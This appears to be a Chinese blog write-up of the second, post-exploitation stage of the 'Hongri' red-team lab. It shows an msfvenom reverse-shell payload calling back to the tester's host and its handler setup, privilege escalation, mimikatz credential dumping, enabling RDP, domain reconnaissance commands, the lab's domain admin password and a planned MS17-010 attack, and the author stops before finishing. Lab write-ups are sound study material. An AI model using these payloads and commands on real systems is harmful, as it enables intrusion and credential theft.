红日靶场(内网渗透)——2

1.后渗透。

之前我们已经将小马上传,在这里用webshell进行进一步渗透。

1)基于msf

利用msf生成exe,并上传。

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe   

 

 

 

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.248.128
set lport 1234
exploit 

 

 

 之后直接进行提权。

2)进行提权。

 

 

 这里用户为admin,所以可以直接提到system。

3)获取账号密码。

Windows系统下的hash密码格式为:
用户名称:RID:LM-HASH值:NT-HASH值
例如:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

windows hash加密机制
  1. 先将用户密码转换为十六进制格式。
  2. 将十六进制格式的密码进行Unicode编码。
  3. 使用MD4摘要算法对Unicode编码数据进行Hash计算

 

具体请参考:https://blog.csdn.net/vanarrow/article/details/105667617?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165253258416781435465254%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165253258416781435465254&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-105667617-null-null.142^v9^pc_search_result_cache,157^v4^control&utm_term=windows+hash%E5%8A%A0%E5%AF%86%E6%9C%BA%E5%88%B6&spm=1018.2226.3001.4187

4)mimikatz

这里主要利用mimikatz进行明文密码的获取

这里不过多介绍,详情可以参考这篇文章:

https://www.csdn.net/tags/Ntzacg2sMTE0NDUtYmxvZwO0O0OO0O0O.html

5)开启3389端口

run post/windows/manage/enable_rdp

2.横向渗透

1)信息收集

ipconfig /all   # 查看本机ip,所在域
route print     # 打印路由信息
net view        # 查看局域网内其他主机名
arp -a          # 查看arp缓存
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享
net share ipc$  # 开启ipc共享
net share c$    # 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件

net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators    # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器(可能有多台)

以上是一些常用指令。

 

 

 

 大概收集的信息为

域控为OWA$
域管理员为Administrator
密码为HONGRISEC@2019
内网网段为192.168.52.1/24

进入msf收集ip

 

共三个ip,其中192.168.52.143为win7

利用msf扫描192.168.52.141端口

 

 

 192.168.52.138得到的信息相同

因为两者都开放445端口,采用ms17-010进行攻击。

利用ms17-010时发现一个问题,不能直接利用,所以开启3389,使用代理。

这里因为个人环境的一些问题,没有继续下去,自己还是差很多东西,之后继续努力吧。

 

posted @ 2022-05-15 02:18  yaolingyu1  阅读(71)  评论(0编辑  收藏  举报